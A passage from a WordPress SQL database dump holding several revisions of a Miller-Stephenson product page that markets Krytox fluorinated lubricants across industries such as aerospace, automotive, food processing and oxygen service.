of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:18:19', '2016-09-28 17:18:19', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2097, 2, '2016-09-28 17:22:42', '2016-09-28 17:22:42', '<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\n<p><strong>Pick your Industry</strong></p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<p><strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong></p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p><strong>Box Board Corrugating</strong></p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p><strong>Food Processing</strong></p>\n<p><strong>Medical Industry Equipment Applications</strong></p>\n<p><strong>Metal Processing</strong></p>\n<p><strong>Oxygen and Reactive Gas Service</strong></p>\n<p><strong>Power Generation</strong></p>\n<p><strong>Pulp and Paper</strong></p>\n<p><strong>Textile</strong></p>\n<p><strong>Tire Mold</strong></p>\n<p>&nbsp;</p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and efficacy:</p>\n<ul>\n<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\n</ul>\n<p><strong>Metal Processing </strong></p>\n<p>With high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.</p>\n<p><strong>Oxygen and Reactive Gas Service </strong></p>\n<p>When working with reactive gas equipment, failure is not an option.</p>\n<p>Conventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.</p>\n<p>Reactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:</p>\n<ul>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, and valves</li>\n<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\n</ul>\n<p>Lubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.</p>\n<p><strong>Power Generation</strong></p>\n<p>Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.</p>\n<p>Krytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\n<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\n<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\n</ul>\n<p><strong>Pulp and Paper</strong></p>\n<p>Choose the lubricant that can move pulp and paper productivity to new levels.</p>\n<p>In the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:</p>\n<ul>\n<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\n<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\n<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\n</ul>\n<p>As in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.</p>\n<p>Krytox technology can help provide the best available equipment performance and lowest available life cycle cost through:</p>\n<ul>\n<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\n<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\n</ul>\n<p><strong>Textile</strong></p>\n<p>Krytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.</p>\n<p>Krytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>No oxidation or degradation</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Compatible with oxygen and chlorine</li>\n</ul>\n<p><strong>Tire Mold</strong></p>\n<p>Krytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.</p>\n<ul>\n<li>High temperature performance</li>\n<li>Extended re-application interval</li>\n<li>Excellent adhesion</li>\n<li>High hydrolytic stability</li>\n<li>Elimination of carbon residue build-up on molds</li>\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 17:22:42', '2016-09-28 17:22:42', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2099, 2, '2016-09-28 17:48:46', '2016-09-28 17:48:46', '<p>&nbsp;</p>\n<p>&nbsp;</p>\n[row col_style="dashed"]\n\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span="4" span__sm="12"]\n\n\n[/col]\n[col span__sm="12"]\n\n\n[/col]\n[col span__sm="12"]\n\n\n[/col]\n\n[/row]\n<p><span style="font-size: 130%;"><strong>Industries and Applications</strong></span></p>\n<p><strong>Pick your Industry</strong></p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<p><strong style="font-size: 14.4px;">Automotive—Squeak and Rattle</strong></p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p><strong>Box Board Corrugating</strong></p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p><strong>Food Processing</strong></p>\n<p><strong>Medical Industry Equipment Applications</strong></p>\n<p><strong>Metal Processing</strong></p>\n<p><strong>Oxygen and Reactive Gas Service</strong></p>\n<p><strong>Power Generation</strong></p>\n<p><strong>Pulp and Paper</strong></p>\n<p><strong>Textile</strong></p>\n<p><strong>Tire Mold</strong></p>\n<p>&nbsp;</p>\n<p><strong>Aerospace, Aviation, and National Defense</strong></p>\n<ul>\n<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\n<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\n</ul>\n<p>Based on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:</p>\n<ul>\n<li>Low outgassing • Wide temperature range</li>\n<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\n<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\n</ul>\n<p>General Applications</p>\n<ul>\n<li>Bearings—all types</li>\n<li>Seals—valves and pumps</li>\n<li>O-rings—sealants, lubricants</li>\n</ul>\n<p>Aerospace-Specific Applications</p>\n<ul>\n<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\n<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\n<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\n<li>Mechanical components—spline shafts, control linkages</li>\n</ul>\n[ux_product_categories ids="35,99,100,101" number="10"]\n\n<p><strong>Automotive—Squeak and Rattle</strong></p>\n<p>Miller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.</p>\n<p><strong>Automotive—Mechanical Systems</strong></p>\n<p>Design/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:</p>\n<ul>\n<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\n<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\n</ul>\n<p>The public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:</p>\n<ul>\n<li>A wide temperature range</li>\n<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\n<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\n<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\n<li>Chassis: wheel bearings, CV/universal joints</li>\n</ul>\n<p>• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers</p>\n<p>Krytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.</p>\n<p><strong>Chemical and Petrochemical</strong></p>\n<p>Miller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:</p>\n<ul>\n<li>Extended equipment life</li>\n<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\n<li>No ignition at pressures up to 350 bar</li>\n<li>Compatibility with polymers used in seals, O-rings, valves</li>\n<li>BAM certification</li>\n</ul>\n<p>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.</p>\n<p><strong>Box Board Corrugating</strong></p>\n<p>Krytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:</p>\n<ul>\n<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\n<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\n<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\n<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\n</ul>\n<p>Krytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:</p>\n<ul>\n<li>ISO-9002 certified</li>\n<li>Long-term wear resistance</li>\n<li>Decreased wear and bearing failure</li>\n<li>Protection from rust and high-temperature corrosion</li>\n<li>No carbonization</li>\n<li>Superior lubricity</li>\n<li>Compatible with all metals, elastomers, and plastics</li>\n<li>Water, steam, and chemical resistant in the most severe environments</li>\n</ul>\n<p><strong>Electronics/Semiconductor</strong></p>\n<p>Krytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:</p>\n<ul>\n<li>Wet and dry vacuum pumps</li>\n<li>Vacuum system sealants</li>\n<li>Clean rooms</li>\n<li>Robotics</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\n<li>Bearings</li>\n<li>Valves</li>\n<li>Seals</li>\n<li>O-rings</li>\n<li>Chains</li>\n<li>Compressors</li>\n<li>Gear boxes</li>\n<li>Mechanical pumps and other components</li>\n</ul>\n<p><strong>Food Processing</strong></p>\n<p>Krytox lubricants for use in the food processing industry are:</p>\n<ul>\n<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\n<li>Able to protect bearings and other components under all load and speed conditions</li>\n<li>Available in a full line of H-1 PFPE lubricants</li>\n</ul>\n<p>Krytox oils and greases offer unmatched stability and flexibility:</p>\n<ul>\n<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\n<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\n<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\n</ul>\n<p><strong>Medical Industry Equipment Applications </strong></p>\n<p>In medical applications, Krytox lubricants offer safety and 